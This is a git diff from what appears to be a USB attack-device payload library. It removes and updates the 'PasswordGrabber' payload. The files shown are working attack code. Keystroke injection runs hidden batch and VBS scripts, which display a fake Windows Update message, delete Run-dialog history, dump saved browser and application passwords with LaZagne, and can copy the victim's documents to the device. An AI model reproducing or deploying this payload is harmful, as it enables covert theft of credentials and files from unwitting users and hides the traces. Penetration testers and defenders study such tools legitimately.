diff --git a/payloads/library/PasswordGrabber/d.cmd b/payloads/library/PasswordGrabber/d.cmd deleted file mode 100644 index 604ef639..00000000 --- a/payloads/library/PasswordGrabber/d.cmd +++ /dev/null @@ -1,4 +0,0 @@ -@echo off -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" -cscript %~dp0\i.vbs %~dp0\e.cmd -@exit \ No newline at end of file diff --git a/payloads/library/PasswordGrabber/e.cmd b/payloads/library/PasswordGrabber/e.cmd deleted file mode 100644 index 5f8d8d89..00000000 --- a/payloads/library/PasswordGrabber/e.cmd +++ /dev/null @@ -1,38 +0,0 @@ -@echo off -@echo Installing Windows Update - -REM Delete registry keys storing Run dialog history -REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f - -REM Creates directory compromised of computer name, date and time -REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious - -REM This executes LaZagne in the current directory and outputs the password file to Loot -REM Time and Date is also added -setlocal -cd /d %~dp0 -%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt - -REM These lines if you just want Passwords and no files. -set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% -mkdir %dst% >>nul - -if Exist %USERPROFILE%\Documents ( -REM /C Continues copying even if errors occur. -REM /Q Does not display file names while copying. -REM /G Allows the copying of encrypted files to destination that does not support encryption. -REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. -REM /E Copies directories and subdirectories, including empty ones. - -REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul - -REM Same as above but does not create empty directories -REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul - -) - -REM Blink CAPSLOCK key -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" - -@cls -@exit diff --git a/payloads/library/PasswordGrabber/i.vbs b/payloads/library/PasswordGrabber/i.vbs deleted file mode 100644 index 1ffd3c3e..00000000 --- a/payloads/library/PasswordGrabber/i.vbs +++ /dev/null @@ -1 +0,0 @@ -CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False diff --git a/payloads/library/PasswordGrabber/payload.txt b/payloads/library/PasswordGrabber/payload.txt deleted file mode 100644 index 44a01065..00000000 --- a/payloads/library/PasswordGrabber/payload.txt +++ /dev/null @@ -1,19 +0,0 @@ -#!/bin/bash -# -# Title: USB Exfiltrator -# Author: Hak5Darren -# Version: 1.1 -# Target: Windows XP SP3+ -# Props: Diggster, IMcPwn -# Category: Exfiltration -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. -# - -LED ATTACK -ATTACKMODE HID STORAGE -DUCKY_LANG se -RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" -LED FINISH diff --git a/payloads/library/PasswordGrabber/readme.md b/payloads/library/PasswordGrabber/readme.md deleted file mode 100644 index b9f0efb8..00000000 --- a/payloads/library/PasswordGrabber/readme.md +++ /dev/null @@ -1,32 +0,0 @@ -# PasswordGrabber - -* Author: RazerBlade -* Creds: Hak5Darren, AlessandroZ -* Version: Version 1.1 -* Firmware support: 1.1 -* Target: Windows - -## Description - -Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... -This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. -Full read here: https://github.com/AlessandroZ/LaZagne - - -## Configuration -By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. -I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy - -Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne -When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go! - -## STATUS - -| LED | Status | -| ------------------ | -------------------------------------------- | -| Red | Attack Setup | -| Green | Attack Complete | - -## Discussion -[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ - diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd index b8e4d40f..5f8d8d89 100644 --- a/payloads/library/credentials/PasswordGrabber/e.cmd +++ b/payloads/library/credentials/PasswordGrabber/e.cmd @@ -7,10 +7,13 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious +REM This executes LaZagne in the current directory and outputs the password file to Loot +REM Time and Date is also added setlocal cd /d %~dp0 -%~dp0\laZagne.exe all > %~dp0\..\..\loot\passwords.txt +%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt +REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% mkdir %dst% >>nul diff --git a/payloads/library/credentials/PasswordGrabber/laZagne.exe b/payloads/library/credentials/PasswordGrabber/laZagne.exe deleted file mode 100644 index 84724d07..00000000 Binary files a/payloads/library/credentials/PasswordGrabber/laZagne.exe and /dev/null differ diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 3dd70e68..44a01065 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt @@ -1,24 +1,19 @@ #!/bin/bash # -# Title: USB Exfiltration +# Title: USB Exfiltrator # Author: Hak5Darren -# Version: 1.0 +# Version: 1.1 # Target: Windows XP SP3+ # Props: Diggster, IMcPwn +# Category: Exfiltration # # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs -# which in turn copies documents to the loot folder on the Bash Bunny. +# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. # -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -LED R +LED ATTACK ATTACKMODE HID STORAGE -QUACK SET_LANGUAGE se -QUACK GUI r -QUACK DELAY 100 -QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" -QUACK ENTER -LED G +DUCKY_LANG se +RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" +LED FINISH diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md index 48605c9f..b9f0efb8 100644 --- a/payloads/library/credentials/PasswordGrabber/readme.md +++ b/payloads/library/credentials/PasswordGrabber/readme.md @@ -2,7 +2,8 @@ * Author: RazerBlade * Creds: Hak5Darren, AlessandroZ -* Version: Version 1.0 +* Version: Version 1.1 +* Firmware support: 1.1 * Target: Windows ## Description @@ -16,7 +17,8 @@ Full read here: https://github.com/AlessandroZ/LaZagne By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy -If you are afraid of .exe you can compile your self from his github: https://github.com/AlessandroZ/LaZagne +Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne +When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go! ## STATUS @@ -26,8 +28,5 @@ If you are afraid of .exe you can compile your self from his github: https://git | Green | Attack Complete | ## Discussion -[Hak5 Forum Thread]("https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/") +[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ -## Future Work - -I will try to add mac support and also make the password file appear in the loot folder that [usb_exfiltrator] creates.